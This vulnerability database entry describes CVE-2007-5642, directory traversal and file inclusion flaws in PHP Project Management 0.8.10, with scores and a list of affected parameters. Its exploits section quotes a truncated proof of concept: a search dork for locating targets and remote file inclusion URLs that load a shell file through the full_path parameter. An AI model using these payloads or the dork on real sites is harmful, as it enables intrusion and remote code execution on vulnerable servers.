6.8
CVSSv2

CVE-2007-5642

Published: 23/10/2007 Updated: 29/09/2017
CVSS v2 Base Score: 6.8 | Impact Score: 6.4 | Exploitability Score: 8.6
VMScore: 685
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P

Vulnerability Summary

Multiple directory traversal vulnerabilities in PHP Project Management 0.8.10 and previous versions allow remote malicious users to include and execute arbitrary local files via a .. (dot dot) in (1) the def_lang parameter to modules/files/list.php; the m_path parameter to (2) modules/projects/summary.inc.php or (3) modules/tasks/summary.inc.php; (4) the module parameter to modules/projects/list.php; or the module parameter to index.php in the (5) certinfo, (6) emails, (7) events, (8) fax, (9) files, (10) groupadm, (11) history, (12) info, (13) log, (14) mail, (15) messages, (16) organizations, (17) phones, (18) presence, (19) projects, (20) reports, (21) search, (22) snf, (23) syslog, (24) tasks, or (25) useradm subdirectory of modules/.

Vulnerable Product Search on Vulmon Subscribe to Product

phppm php project management

Exploits

# PHP Project Management <= 0810 Multiple RFI / LFI Vulnerabilities # surfnetdlsourceforgenet/sourceforge/php-pm/release-08targz # DORK : "PHP Project Management 0810" # POC : RFI # /modules/certinfo/indexphp?full_path=localhost/shelltxt? # /modules/emails/indexphp?full_path=localhost/shelltxt? # /module ...